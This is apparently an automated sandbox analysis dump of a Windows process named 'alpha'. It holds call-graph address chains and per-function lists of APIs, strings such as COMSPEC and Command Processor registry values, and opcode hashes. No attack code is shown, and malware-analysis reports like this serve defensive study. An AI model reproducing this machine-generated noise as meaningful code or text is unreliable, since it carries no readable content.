7ff79375598d VirtualQuery 19093->19095 19094->18988 19095->19094 19097 7ff7937559ad 19095->19097 19096 7ff7937559b7 VirtualQuery 19096->19094 19096->19097 19097->19094 19097->19096 19099 7ff79376e954 19098->19099 19100 7ff79376e990 19098->19100 19101 7ff79376ee88 390 API calls 19099->19101 19102 7ff79376e9b4 197 API calls 19100->19102 19104 7ff79376e964 19101->19104 19103 7ff79376e995 longjmp 19102->19103 19104->19100 19105 7ff7937496b4 186 API calls 19104->19105 19105->19104 19107 7ff7937676a3 19106->19107 19108 7ff7937676b7 19107->19108 19110 7ff7937496b4 186 API calls 19107->19110 19109 7ff79376e9b4 197 API calls 19108->19109 19111 7ff7937676bc longjmp 19109->19111 19110->19107 19114 7ff7937504a4 19112->19114 19113 7ff7937526e0 19 API calls 19113->19114 19114->19113 19115 7ff7937504b9 _get_osfhandle SetFilePointer 19114->19115 19116 7ff79375d845 19114->19116 19118 7ff79375d839 19114->19118 19121 7ff793743278 166 API calls 19114->19121 19115->19083 19117 7ff79376f1d8 166 API calls 19116->19117 19120 7ff79375d837 19117->19120 19119 7ff793743278 166 API calls 19118->19119 19119->19120 19122 7ff79375d819 _getch 19121->19122 19122->19114 19123 7ff79375d832 19122->19123 19222 7ff79376bde4 EnterCriticalSection LeaveCriticalSection 19123->19222 19126 7ff79374df93 19125->19126 19127 7ff79374dfe2 19125->19127 19126->19127 19128 7ff79374df9f GetProcessHeap RtlFreeHeap 19126->19128 19129 7ff79374e100 VirtualFree 19127->19129 19130 7ff79374e00b _setjmp 19127->19130 19128->19126 19128->19127 19129->19127 19131 7ff79374e04a 19130->19131 19132 7ff79374e0c3 19130->19132 19133 7ff79374e600 473 API calls 19131->19133 19132->19052 19134 7ff79374e073 19133->19134 19135 7ff79374e0e0 longjmp 19134->19135 19136 7ff79374e081 19134->19136 19144 7ff79374e0b0 19135->19144 19137 7ff79374d250 475 API calls 19136->19137 19138 7ff79374e086 19137->19138 19141 7ff79374e600 473 API calls 19138->19141 19138->19144 19142 7ff79374e0a7 19141->19142 19143 7ff79376d610 167 API calls 19142->19143 
19142->19144 19143->19144 19144->19132 19223 7ff79376d3fc 19144->19223 19146 7ff79376eefd 19145->19146 19147 7ff79376eed1 19145->19147 19285 7ff79375885c FormatMessageW 19146->19285 19271 7ff793747420 19147->19271 19151 7ff7937501b8 6 API calls 19152 7ff79376eee5 19151->19152 19154 7ff79376eeeb 19152->19154 19155 7ff79376eef8 19152->19155 19153 7ff79376ef04 19156 7ff79376ef41 LocalFree GetStdHandle GetConsoleMode 19153->19156 19159 7ff79376ef2f _wcsupr 19153->19159 19157 7ff79374d208 _close 19154->19157 19158 7ff79374d208 _close 19155->19158 19161 7ff79376efe8 GetStdHandle GetConsoleMode 19156->19161 19162 7ff79376efcf SetConsoleMode 19156->19162 19178 7ff79376eef0 19157->19178 19158->19146 19159->19156 19163 7ff79376f015 SetConsoleMode 19161->19163 19171 7ff79376f03c 19161->19171 19162->19161 19163->19171 19164 7ff793758f80 7 API calls 19165 7ff79375c879 19164->19165 19165->19048 19165->19049 19166 7ff793743240 166 API calls 19166->19171 19167 7ff79376f07e GetStdHandle FlushConsoleInputBuffer 19167->19171 19168 7ff79376f0a0 GetStdHandle 19169 7ff793768450 367 API calls 19168->19169 19169->19171 19170 7ff79376f12d wcschr 19170->19171 19171->19166 19171->19167 19171->19168 19171->19170 19172 7ff79376f161 19171->19172 19175 7ff793753448 166 API calls 19171->19175 19177 7ff79376f0d7 towupper 19171->19177 19179 7ff7937501b8 6 API calls 19171->19179 19180 7ff793753448 166 API calls 19171->19180 19173 7ff79376f17a 19172->19173 19174 7ff79376f166 SetConsoleMode 19172->19174 19176 7ff79376f17f SetConsoleMode 19173->19176 19173->19178 19174->19173 19175->19170 19176->19178 19177->19171 19178->19164 19179->19171 19180->19171 19204 7ff7937677bc 19181->19204 19182 7ff793767aca 19185 7ff7937534a0 166 API calls 19182->19185 19183 7ff7937679c0 19189 7ff7937534a0 166 API calls 19183->19189 19187 7ff793767adb 19185->19187 19186 7ff793767ab5 19190 7ff793753448 166 API calls 19186->19190 19192 7ff793767af0 19187->19192 19195 7ff793753448 166 API calls 19187->19195 19188 7ff793767984 
19188->19183 19193 7ff793767989 19188->19193 19194 7ff7937679d6 19189->19194 19205 7ff7937679ef 19190->19205 19191 7ff793767a00 19197 7ff793767a0b 19191->19197 19191->19205 19208 7ff793767a33 19191->19208 19196 7ff79376778c 166 API calls 19192->19196 19193->19205 19290 7ff7937676e0 19193->19290 19199 7ff793753448 166 API calls 19194->19199 19211 7ff7937679e7 19194->19211 19195->19192 19198 7ff793767afb 19196->19198 19201 7ff7937534a0 166 API calls 19197->19201 19197->19205 19198->19193 19202 7ff793753448 166 API calls 19198->19202 19199->19211 19206 7ff793767a23 19201->19206 19202->19193 19203 7ff793753448 166 API calls 19203->19205 19204->19182 19204->19183 19204->19186 19204->19188 19204->19191 19204->19193 19204->19205 19207 7ff79376778c 166 API calls 19204->19207 19210 7ff793753448 166 API calls 19204->19210 19205->19083 19209 7ff79376778c 166 API calls 19206->19209 19207->19204 19208->19203 19209->19211 19210->19204 19286 7ff793767730 19211->19286 19213 7ff79376c775 19212->19213 19219 7ff79376c7ab 19212->19219 19214 7ff79374cd90 166 API calls 19213->19214 19215 7ff79376c781 19214->19215 19216 7ff79376c8d4 19215->19216 19217 7ff79374b0d8 194 API calls 19215->19217 19216->19083 19217->19216 19218 7ff79374b6b0 170 API calls 19218->19219 19219->19215 19219->19216 19219->19218 19220 7ff79374b038 _dup2 19219->19220 19221 7ff79374d208 _close 19219->19221 19220->19219 19221->19219 19225 7ff79376d419 19223->19225 19224 7ff79376d576 19226 7ff79376d555 19224->19226 19227 7ff79376d592 19224->19227 19225->19224 19225->19226 19225->19227 19229 7ff79376d5c4 19225->19229 19232 7ff79376d541 19225->19232 19235 7ff793753448 166 API calls 19225->19235 19239 7ff79375cadf 19225->19239 19240 7ff79376d3fc 166 API calls 19225->19240 19248 7ff79376d31c 19226->19248 19228 7ff793753448 166 API calls 19227->19228 19231 7ff79376d5a5 19228->19231 19233 7ff793753448 166 API calls 19229->19233 19234 7ff79376d5ba 19231->19234 19237 7ff793753448 166 API calls 19231->19237 19232->19227 19236 
7ff79376d546 19232->19236 19233->19239 19241 7ff79376d36c 19234->19241 19235->19225 19236->19226 19236->19229 19237->19234 19240->19225 19242 7ff79376d3d8 19241->19242 19243 7ff79376d381 19241->19243 19244 7ff7937534a0 166 API calls 19243->19244 19246 7ff79376d390 19244->19246 19245 7ff793753448 166 API calls 19245->19246 19246->19242 19246->19245 19247 7ff7937534a0 166 API calls 19246->19247 19247->19246 19249 7ff793753448 166 API calls 19248->19249 19250 7ff79376d33b 19249->19250 19251 7ff79376d36c 166 API calls 19250->19251 19252 7ff79376d343 19251->19252 19253 7ff79376d3fc 166 API calls 19252->19253 19255 7ff79376d34e 19253->19255 19254 7ff79376d576 19256 7ff79376d592 19254->19256 19264 7ff79376d555 19254->19264 19255->19254 19255->19256 19258 7ff79376d5c4 19255->19258 19261 7ff79376d541 19255->19261 19255->19264 19267 7ff79376d3fc 166 API calls 19255->19267 19269 7ff79376d5c2 19255->19269 19270 7ff793753448 166 API calls 19255->19270 19257 7ff793753448 166 API calls 19256->19257 19260 7ff79376d5a5 19257->19260 19262 7ff793753448 166 API calls 19258->19262 19259 7ff79376d31c 166 API calls 19259->19269 19263 7ff79376d5ba 19260->19263 19265 7ff793753448 166 API calls 19260->19265 19261->19256 19268 7ff79376d546 19261->19268 19262->19269 19266 7ff79376d36c 166 API calls 19263->19266 19264->19259 19265->19263 19266->19269 19267->19255 19268->19258 19268->19264 19269->19239 19270->19255 19272 7ff793747468 19271->19272 19273 7ff79374745f 19271->19273 19272->19146 19272->19151 19273->19272 19274 7ff793747497 _wcsicmp 19273->19274 19275 7ff7937648c8 _wcsicmp 19273->19275 19276 7ff793751ea0 8 API calls 19274->19276 19277 7ff7937648ed CreateFileW 19275->19277 19278 7ff7937474bd 19276->19278 19279 7ff7937474c9 CreateFileW 19277->19279 19280 7ff793764929 19277->19280 19278->19277 19278->19279 19281 7ff793747501 _open_osfhandle 19279->19281 19282 7ff793764943 GetLastError 19279->19282 19280->19281 19281->19272 19283 7ff793747520 CloseHandle 19281->19283 19282->19272 
19283->19272 19285->19153 19289 7ff79376773c 19286->19289 19287 7ff79376777d 19287->19205 19288 7ff793753448 166 API calls 19288->19289 19289->19287 19289->19288 19291 7ff79376778c 166 API calls 19290->19291 19292 7ff7937676fb 19291->19292 19293 7ff79376771c 19292->19293 19294 7ff793753448 166 API calls 19292->19294 19293->19205 19295 7ff793767711 19294->19295 19296 7ff79376778c 166 API calls 19295->19296 19296->19293 19298 7ff79374c4c9 19297->19298 19299 7ff79374c486 19297->19299 19303 7ff79374ff70 2 API calls 19298->19303 19304 7ff79374c161 19298->19304 19300 7ff79374c48e wcschr 19299->19300 19299->19304 19301 7ff79374c4ef 19300->19301 19300->19304 19302 7ff79374cd90 166 API calls 19301->19302 19310 7ff79374c4f9 19302->19310 19303->19304 19304->18735 19304->18758 19305 7ff79374c5bd 19307 7ff79374b6b0 170 API calls 19305->19307 19309 7ff79374c541 19305->19309 19306 7ff79374ff70 2 API calls 19306->19304 19307->19309 19308 7ff79374d840 178 API calls 19308->19310 19309->19304 19309->19306 19310->19304 19310->19305 19310->19308 19310->19309 19312 7ff79374b018 19311->19312 19312->18799 19313->18799 19315 7ff793753bcf 19314->19315 19317 7ff793753bfe 19314->19317 19316 7ff793753bdc wcschr 19315->19316 19315->19317 19316->19315 19316->19317 19317->18862 19319 7ff793752f97 19318->19319 19320 7ff793752f2a 19318->19320 19319->19320 19321 7ff793752f9c wcschr 19319->19321 19322 7ff79375823c 10 API calls 19320->19322 19323 7ff793752fb6 wcschr 19321->19323 19324 7ff793752f5a 19321->19324 19325 7ff793752f56 19322->19325 19323->19320 19323->19324 19327 7ff793758f80 7 API calls 19324->19327 19331 7ff79375e4ec 19324->19331 19325->19324 19326 7ff793753a0c 2 API calls 19325->19326 19328 7ff793752fe0 19326->19328 19329 7ff793752f83 19327->19329 19328->19324 19330 7ff793752fe9 wcsrchr 19328->19330 19329->18862 19330->19324 19333 7ff7937472de 19332->19333 19334 7ff793764621 19332->19334 19335 7ff7937472eb 19333->19335 19343 7ff793764467 19333->19343 19344 7ff793764530 19333->19344 19336 
7ff7937647e0 19334->19336 19337 7ff79376447b longjmp 19334->19337 19340 7ff793764639 19334->19340 19368 7ff79376475e 19334->19368 19393 7ff793747348 19335->19393 19339 7ff793747348 168 API calls 19336->19339 19341 7ff793764492 19337->19341 19391 7ff793764524 19339->19391 19345 7ff793764695 19340->19345 19360 7ff79376463e 19340->19360 19346 7ff793747348 168 API calls 19341->19346 19343->19335 19343->19341 19349 7ff793764475 19343->19349 19347 7ff793747348 168 API calls 19344->19347 19354 7ff7937473d4 168 API calls 19345->19354 19361 7ff7937644a8 19346->19361 19377 7ff793764549 19347->19377 19348 7ff793747315 19408 7ff7937473d4 19348->19408 19349->19337 19349->19345 19350 7ff793747348 168 API calls 19350->19336 19351 7ff793747348 168 API calls 19351->19348 19352 7ff7937472b0 168 API calls 19356 7ff79376480e 19352->19356 19370 7ff79376469a 19354->19370 19355 7ff7937645b2 19358 7ff793747348 168 API calls 19355->19358 19356->18890 19357 7ff793747323 19357->18890 19365 7ff7937645c7 19358->19365 19359 7ff793764654 19367 7ff793747348 168 API calls 19359->19367 19360->19337 19360->19359 19366 7ff7937644e2 19361->19366 19373 7ff793747348 168 API calls 19361->19373 19362 7ff79376455e 19362->19355 19371 7ff793747348 168 API calls 19362->19371 19363 7ff7937646e1 19364 7ff7937472b0 168 API calls 19363->19364 19369 7ff793764738 19364->19369 19372 7ff793747348 168 API calls 19365->19372 19374 7ff7937472b0 168 API calls 19366->19374 19367->19357 19368->19350 19375 7ff793747348 168 API calls 19369->19375 19370->19363 19382 7ff7937646c7 19370->19382 19383 7ff7937646ea 19370->19383 19371->19355 19376 7ff7937645db 19372->19376 19373->19366 19378 7ff7937644f1 19374->19378 19375->19391 19380 7ff793747348 168 API calls 19376->19380 19377->19355 19377->19362 19379 7ff793747348 168 API calls 19377->19379 19381 7ff7937472b0 168 API calls 19378->19381 19379->19362 19384 7ff7937645ec 19380->19384 19385 7ff793764503 19381->19385 19382->19363 19389 7ff793747348 168 API calls 19382->19389 19386 
7ff793747348 168 API calls 19383->19386 19387 7ff793747348 168 API calls 19384->19387 19385->19357 19388 7ff793747348 168 API calls 19385->19388 19386->19363 19390 7ff793764600 19387->19390 19388->19391 19389->19363 19392 7ff793747348 168 API calls 19390->19392 19391->19352 19391->19357 19392->19391 19399 7ff79374735d 19393->19399 19394 7ff793743278 166 API calls 19395 7ff793764820 longjmp 19394->19395 19396 7ff793764838 19395->19396 19397 7ff793743278 166 API calls 19396->19397 19398 7ff793764844 longjmp 19397->19398 19400 7ff79376485a 19398->19400 19399->19394 19399->19396 19407 7ff7937473ab 19399->19407 19401 7ff793747348 166 API calls 19400->19401 19402 7ff79376487b 19401->19402 19403 7ff793747348 166 API calls 19402->19403 19404 7ff7937648ad 19403->19404 19405 7ff793747348 166 API calls 19404->19405 19406 7ff7937472ff 19405->19406 19406->19348 19406->19351 19409 7ff79376485a 19408->19409 19410 7ff793747401 19408->19410 19411 7ff793747348 168 API calls 19409->19411 19410->19357 19412 7ff79376487b 19411->19412 19413 7ff793747348 168 API calls 19412->19413 19414 7ff7937648ad 19413->19414 19415 7ff793747348 168 API calls 19414->19415 19416 7ff7937648be 19415->19416 19416->19357 16786 7ff793758d80 16787 7ff793758da4 16786->16787 16788 7ff793758db6 16787->16788 16789 7ff793758dbf Sleep 16787->16789 16790 7ff793758ddb _amsg_exit 16788->16790 16793 7ff793758de7 16788->16793 16789->16787 16790->16793 16791 7ff793758e56 _initterm 16795 7ff793758e73 _IsNonwritableInCurrentImage 16791->16795 16792 7ff793758e3c 16793->16791 16793->16792 16793->16795 16800 7ff7937537d8 GetCurrentThreadId OpenThread 16795->16800 16833 7ff7937504f4 16800->16833 16802 7ff793753839 HeapSetInformation RegOpenKeyExW 16803 7ff79375388d 16802->16803 16804 7ff79375e9f8 RegQueryValueExW RegCloseKey 16802->16804 16805 7ff793755920 VirtualQuery VirtualQuery 16803->16805 16807 7ff79375ea41 GetThreadLocale 16804->16807 16806 7ff7937538ab GetConsoleOutputCP GetCPInfo 16805->16806 16806->16807 16808 
7ff7937538f1 memset 16806->16808 16810 7ff793753919 16807->16810 16808->16810 16809 7ff793754d5c 391 API calls 16809->16810 16810->16804 16810->16809 16811 7ff79375eb27 _setjmp 16810->16811 16812 7ff793753948 _setjmp 16810->16812 16813 7ff793768530 370 API calls 16810->16813 16814 7ff793743240 166 API calls 16810->16814 16815 7ff7937501b8 6 API calls 16810->16815 16816 7ff793754c1c 166 API calls 16810->16816 16817 7ff79374df60 481 API calls 16810->16817 16818 7ff79375eb71 _setmode 16810->16818 16819 7ff7937586f0 182 API calls 16810->16819 16820 7ff793750580 12 API calls 16810->16820 16823 7ff7937558e4 EnterCriticalSection LeaveCriticalSection 16810->16823 16824 7ff79374be00 647 API calls 16810->16824 16825 7ff7937558e4 EnterCriticalSection LeaveCriticalSection 16810->16825 16811->16810 16812->16810 16813->16810 16814->16810 16815->16810 16816->16810 16817->16810 16818->16810 16819->16810 16821 7ff79375398b GetConsoleOutputCP GetCPInfo 16820->16821 16822 7ff7937504f4 GetModuleHandleW GetProcAddress SetThreadLocale 16821->16822 16822->16810 16823->16810 16824->16810 16826 7ff79375ebbe GetConsoleOutputCP GetCPInfo 16825->16826 16827 7ff7937504f4 GetModuleHandleW GetProcAddress SetThreadLocale 16826->16827 16828 7ff79375ebe6 16827->16828 16829 7ff79374be00 647 API calls 16828->16829 16830 7ff793750580 12 API calls 16828->16830 16829->16828 16831 7ff79375ebfc GetConsoleOutputCP GetCPInfo 16830->16831 16832 7ff7937504f4 GetModuleHandleW GetProcAddress SetThreadLocale 16831->16832 16832->16810 16834 7ff793750504 16833->16834 16835 7ff79375051e GetModuleHandleW 16834->16835 16836 7ff79375054d GetProcAddress 16834->16836 16837 7ff79375056c SetThreadLocale 16834->16837 16835->16834 16836->16834
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                                                      • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                                                      • API String ID: 3305344409-4288247545
                                                                                      • Opcode ID: 70fe977c148540083158fa9cabe6887d804174c165fa23e72430d09dac556fef
                                                                                      • Instruction ID: 4407d8c19104c09594780358b436445b67f96e7267e9bee31977e3d803b385cd
                                                                                      • Opcode Fuzzy Hash: 70fe977c148540083158fa9cabe6887d804174c165fa23e72430d09dac556fef
                                                                                      • Instruction Fuzzy Hash: 5C42C521A0868285FFF8BB3198D42B9A7A8EF8D795F844136D91E677D4DF3CE5448320

                                                                                      Control-flow Graph

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                                                      • String ID: :$:$:$:ON$OFF
                                                                                      • API String ID: 972821348-467788257
                                                                                      • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                      • Instruction ID: 5baea29ec09c63552ddf53e1c55b9fdae56214dad418049467c2a7cb0a0fd6f3
                                                                                      • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                      • Instruction Fuzzy Hash: A3229321A0864286FBF8BF3594D4279E6DAEF5DB81FC88136C90E67394DE3CB5408671

                                                                                      Control-flow Graph

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoLocale$DefaultUsersetlocale
                                                                                      • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                      • API String ID: 1351325837-2236139042
                                                                                      • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                      • Instruction ID: e0b5a3593ae4b09b2ad2ad2e652c9219d7e4c6ef6faf26e3d431666c5e2da33e
                                                                                      • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                      • Instruction Fuzzy Hash: 33F13B61B04742C5EBB5AF21D5902B9A2A8FF0CB91FD44536CA0E677A4EF3CE506C360

                                                                                      Control-flow Graph

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                      • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                                      • API String ID: 388421343-2905461000
                                                                                      • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                      • Instruction ID: 36eef53106bbb2fae4f4d88116937c35fa51eaed6ff1f9c23c6529cd3fa427eb
                                                                                      • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                      • Instruction Fuzzy Hash: C5F13132A0D78295EAB4AB21E4C47BAF7A8FB8D741F804136D94D62754DF3CE445CB60

                                                                                      Control-flow Graph

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryValue$CloseOpensrandtime
                                                                                      • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                      • API String ID: 145004033-3846321370
                                                                                      • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                      • Instruction ID: f1e56129956c445456494d9acf5baf7c64b1fbbc8c684472000762b9549fe907
                                                                                      • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                      • Instruction Fuzzy Hash: 6FE1713261DA82C6E7B0AB20E48057AF7A8FB8C755F805536E68F52B54DF7CE544CB20

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                      • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                      • API String ID: 2624720099-1920437939
                                                                                      • Opcode ID: bc784ebed84259970a51cd510c23a28617bcb94ad13cc89061c4f660481954aa
                                                                                      • Instruction ID: aa689dcef4715ea118d2ce4aa4cc1af3415a4e338a07633f27a695ea0dd10008
                                                                                      • Opcode Fuzzy Hash: bc784ebed84259970a51cd510c23a28617bcb94ad13cc89061c4f660481954aa
                                                                                      • Instruction Fuzzy Hash: 4BC1AF31E086428AF7B8BB7094C02B8FAA9FF4D755F84413AD90E667A1DF3CA4418770

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileFindFirstLast
                                                                                      • String ID:
                                                                                      • API String ID: 873889042-0
                                                                                      • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                      • Instruction ID: 5cb93b0c815139a14eb5a2b2fbb0c5163f8c1f1c3d10c3d8db14a94202199cc4
                                                                                      • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                      • Instruction Fuzzy Hash: 00515231609B4296E7A4AF25E4C4179FBA8FB5DB91F848131CA1E63350CF3CE9548B60

                                                                                      Control-flow Graph

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
